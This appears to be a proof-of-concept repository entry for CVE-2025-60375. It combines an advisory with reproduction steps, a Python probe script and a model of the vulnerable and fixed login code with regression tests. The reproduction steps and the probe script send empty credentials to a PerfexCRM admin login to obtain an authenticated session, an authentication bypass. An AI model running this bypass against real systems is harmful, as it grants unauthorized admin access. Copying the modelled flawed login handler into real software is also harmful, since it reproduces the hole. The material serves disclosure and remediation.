POC details: 4dbc4b83e2db2d4aaa891156796ce57c8a072156

Source
Related vulnerability
Title: Perfex CRM security vulnerability (CVE-2025-60375)
Description: Perfex CRM is an open-source customer relationship management application from Perfex CRM, used to manage customers and projects and to create invoices in the cloud. Perfex CRM versions before 3.3.1 contain a security vulnerability caused by insufficient server-side validation, which may allow the login credential check to be bypassed and grant unauthorized access to user accounts.
Introduction
# CVE-2025-60375 — PerfexCRM Authentication Bypass

**Advisory ID:** perfexcrm-auth-bypass-2025  
**CVE:** CVE-2025-60375  
**Product:** PerfexCRM  
**Affected versions:** versions prior to 3.3.1 (< 3.3.1)  
**Reported by:** Ajansha Shankar, Ahamed Yaseen  
**References:** OWASP Authentication Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

---

## Summary
An authentication bypass exists in the admin login mechanism of PerfexCRM prior to version 3.3.1. The server's authentication workflow does not sufficiently validate the presence and contents of username/password parameters. An attacker who manipulates the login request to supply empty username and password parameters may be granted access to user accounts, including administrative accounts.

---

## Impact
- Unauthorized access to user accounts (including admin).  
- Potential full compromise of the application and sensitive data exposure.  
- Remote exploitation — attacker only needs the ability to send HTTP requests to the login endpoint.

---

## Technical details & reproduction
1. Intercept the POST request sent to the admin login endpoint (e.g., `/admin/auth/login`).  
2. Remove or set `username` and `password` fields to empty values in the request body.  
3. Forward the modified request. The server may return `419 Page expired` if the login page is refreshed afterwards, but the modified request itself is redirected to the dashboard and an authenticated session is issued even though no valid credentials were supplied.
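The three steps above, as a scripted probe. This is an added example, not code from the advisory or from Perfex CRM. It assumes (hypothetically) that the form fields are named `username` and `password`, that the endpoint is the advisory's example path `/admin/auth/login`, and that a successful bypass shows up as a redirect away from the login page together with a `Set-Cookie` header; redirects are deliberately not followed so the first response can be inspected. Run it only against systems you are authorised to test.

```python
"""Probe an admin login endpoint with empty credentials (CVE-2025-60375 check).

Added example, not from the advisory or Perfex CRM. Field names, the login
path and the 'redirect + Set-Cookie means a session was issued' heuristic are
assumptions for this script.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

LOGIN_PATH = "/admin/auth/login"  # example path from the advisory (assumption)


def build_probe(base_url: str, login_path: str = LOGIN_PATH) -> urllib.request.Request:
    """POST with both credential fields present but empty, as in step 2."""
    body = urllib.parse.urlencode({"username": "", "password": ""}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + login_path,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def classify(status: int, headers: dict, login_path: str = LOGIN_PATH) -> str:
    """Interpret the first response to the empty-credential POST.

    vulnerable   : 3xx to somewhere other than the login page plus a Set-Cookie
                   header, i.e. a session was handed out without credentials
    rejected     : explicit 4xx, or a bounce straight back to the login page
    inconclusive : anything else (e.g. a 200 re-rendering the form); inspect
                   the body, and confirm a 'vulnerable' verdict by fetching the
                   dashboard with the returned cookie
    """
    lower = {k.lower(): v for k, v in headers.items()}
    location = urllib.parse.urlparse(lower.get("location", "")).path
    if 300 <= status < 400:
        if location.rstrip("/") == login_path.rstrip("/"):
            return "rejected"
        if "set-cookie" in lower:
            return "vulnerable"
        return "inconclusive"
    if 400 <= status < 500:
        return "rejected"
    return "inconclusive"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the Location header is the evidence we want."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url: str) -> str:
    """Send the probe to `base_url` and classify the first response."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(build_probe(base_url), timeout=10) as resp:
            return classify(resp.status, dict(resp.headers.items()))
    except urllib.error.HTTPError as err:
        # With redirects suppressed urllib raises HTTPError for 3xx as well as 4xx/5xx.
        return classify(err.code, dict(err.headers.items()))


if __name__ == "__main__":
    print(probe(sys.argv[1]))
```

Usage: `python probe.py https://crm.example`. A `vulnerable` verdict is a heuristic; the definitive check is that the cookie from the response lets you load an authenticated page.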

**Root cause (summary):** insufficient server-side validation and improper control flow that allows session or application logic to mark the request as authenticated even with missing credentials.

---

## Mitigation / Remediation
- Fix server-side authentication: reject requests missing username or password with an explicit 4xx error (e.g., 400/401).  
- Ensure session creation and privilege assignment only happen after successful credential verification.  
- Add unit and integration tests to validate behavior against empty/missing credential values.  
- Consider adding rate-limiting and monitoring for suspicious login attempts while fix is deployed.
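The first three remediation points, shown side by side as code. This is an added example and not Perfex CRM's PHP; it is a Python model of the two control flows, with `USERS`, `hash_password`, `Session` and the handler names constructed for the illustration. The vulnerable handler models the pattern the root-cause summary describes (a password check that only runs when both fields are non-empty, with every non-denied path falling through to "authenticated"); the hardened handler rejects absent or empty fields with a 400 before any session state exists, and `rejects_empty_credentials` is the regression test the third bullet asks for.

```python
"""Login control flow: the flaw the advisory describes beside the recommended fix.

Added example, not Perfex CRM code. User store, hashing helper, Session type
and handler names are constructed for the illustration. Status codes follow
the advisory: 400 for a missing/empty field, 401 for a wrong password,
302 (redirect to the dashboard) on success.
"""
import hashlib
import hmac
import os
import secrets
from dataclasses import dataclass
from typing import Optional, Tuple


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store with a single admin account.
_SALT, _DIGEST = hash_password("correct horse battery staple")
USERS = {"admin": {"salt": _SALT, "digest": _DIGEST}}


@dataclass
class Session:
    authenticated: bool = False
    user: Optional[str] = None
    token: Optional[str] = None


def verify_password(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        hash_password(password, _SALT)  # keep timing similar for unknown users
        return False
    _, digest = hash_password(password, record["salt"])
    return hmac.compare_digest(digest, record["digest"])


def login_vulnerable(form: dict) -> Tuple[int, Session]:
    """Modelled flaw: the password check only runs when both fields are
    non-empty, and every path that did not explicitly deny falls through to
    'mark as authenticated'."""
    username = form.get("username", "")
    password = form.get("password", "")
    session = Session()
    if username and password and not verify_password(username, password):
        return 401, session
    # BUG: reached after a correct login AND when either field was empty or missing.
    session.authenticated = True
    session.user = username
    session.token = secrets.token_urlsafe(32)
    return 302, session


def login_hardened(form: dict) -> Tuple[int, Session]:
    """Reject missing/empty fields up front with a 4xx; create session state
    only after the credentials have actually been verified."""
    username = form.get("username", "").strip()
    password = form.get("password", "")
    if not username or not password:
        return 400, Session()  # explicit rejection, no session
    if not verify_password(username, password):
        return 401, Session()
    return 302, Session(authenticated=True, user=username, token=secrets.token_urlsafe(32))


# Regression cases: every variant of an absent credential must be refused
# with a 4xx and must not produce an authenticated session or a token.
EMPTY_CREDENTIAL_FORMS = [
    {"username": "", "password": ""},
    {"username": "admin", "password": ""},
    {"username": "", "password": "x"},
    {"username": "admin"},
    {"password": "x"},
    {},
]


def rejects_empty_credentials(handler) -> bool:
    """True when `handler` denies every EMPTY_CREDENTIAL_FORMS entry correctly."""
    return all(
        400 <= status < 500 and not session.authenticated and session.token is None
        for status, session in (handler(form) for form in EMPTY_CREDENTIAL_FORMS)
    )


if __name__ == "__main__":
    print("vulnerable handler rejects empty credentials:", rejects_empty_credentials(login_vulnerable))
    print("hardened handler rejects empty credentials:  ", rejects_empty_credentials(login_hardened))
```

The point of `rejects_empty_credentials` is that it is written against the handler's contract (status and session state), so it fails for the flawed flow and passes for the fixed one; wiring the same assertions into the project's own test suite is what keeps the fix from regressing.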

---

## Suggested CVSS (example)
- CVSS v3.1 (example): **9.1 (Critical)** for the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (unauthenticated network attacker, no user interaction, high confidentiality and integrity impact, no availability impact).  
> Note: This is an estimated vector for triage. Provide a precise CVSS vector after coordinated disclosure.

---

## Contact / Credit
- Reported by: Ajansha Shankar and Ahamed Yaseen

## References
- https://www.cve.org/CVERecord?id=CVE-2025-60375
- https://www.tenable.com/cve/CVE-2025-60375
File snapshot

[4.0K] /data/pocs/4dbc4b83e2db2d4aaa891156796ce57c8a072156 └── [2.5K] README.md 0 directories, 1 file